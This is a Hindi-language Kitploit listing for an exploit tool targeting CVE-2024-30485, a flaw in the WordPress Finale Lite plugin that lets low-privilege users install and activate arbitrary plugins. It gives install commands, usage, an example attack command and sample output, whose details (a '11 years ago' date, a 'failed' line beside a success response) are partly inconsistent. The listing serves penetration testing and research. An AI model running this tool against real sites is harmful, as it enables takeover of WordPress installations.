Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-30485 — WordPress Finale Lite plugin <= 2.18.0 - Subscriber+ Arbitrary Plugin Installation/Activation भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-30485
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-30485

CVE-2024-30485

WordPress Finale Lite plugin <= 2.18.0 - Subscriber+ Arbitrary Plugin Installation/Activation भेद्यता

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-30485 शोषण

📌 अवलोकन

CVE-2024-30485 WordPress के Finale Lite प्लगइन (संस्करण <= 2.18.0) में पाई गई एक उच्च-गंभीरता वाली भेद्यता है। यह भेद्यता प्रमाणित उपयोगकर्ताओं (सब्सक्राइबर+) को उचित प्राधिकरण के बिना मनमाने प्लगइन्स को स्थापित और सक्रिय करने की अनुमति देती है।

  • गंभीरता: उच्च (CVSS 8.8)
  • प्रभावित संस्करण: Finale Lite <= 2.18.0
  • CWE: CWE-862 (अनुपलब्ध प्राधिकरण)

🚀 विशेषताएं

  • ✅ जांचें कि WordPress साइट असुरक्षित है या नहीं
  • ✅ वैध क्रेडेंशियल्स से प्रमाणीकरण करें
  • ✅ सुरक्षा नॉन्स निकालें
  • ✅ मनमाने प्लगइन्स स्थापित करें
  • ✅ स्थापित प्लगइन्स सक्रिय करें

🛠 आवश्यकताएँ

  • Python 3
  • requests और beautifulsoup4 मॉड्यूल
  • एक असुरक्षित प्लगइन वाली लक्षित WordPress साइट
  • वैध WordPress सब्सक्राइबर+ क्रेडेंशियल्स

📜 स्थापना

root@kitploit:~
# Clone the repository git clone https://github.com/Nxploited/CVE-2024-30485.git cd CVE-2024-30485 # Install dependencies pip install -r requirements.txt

🔍 उपयोग

root@kitploit:~
usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]

Exploit CVE-2024-30485 - Finale Lite | # by Khaled AlEnazi

positional arguments:
  plugin                Plugin slug

options:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET  WordPress site URL
  -U USERNAME, --username USERNAME  WordPress username
  -P PASSWORD, --password PASSWORD  WordPress password

उदाहरण:

root@kitploit:~
python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments

🖥 आउटपुट उदाहरण

root@kitploit:~
[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response: 
<p>Unpacking the package&#8230;</p>
<p>Installing the plugin&#8230;</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। बिना अनुमति के सिस्टम पर अनधिकृत परीक्षण अवैध है। जिम्मेदारी से उपयोग करें।

🔗 संदर्भ

  • आधिकारिक CVE रिकॉर्ड
  • WordPress प्लगइन पेज

द्वारा: खालिद अलेनाज़ी (Nxploit)

टूल डाउनलोड करें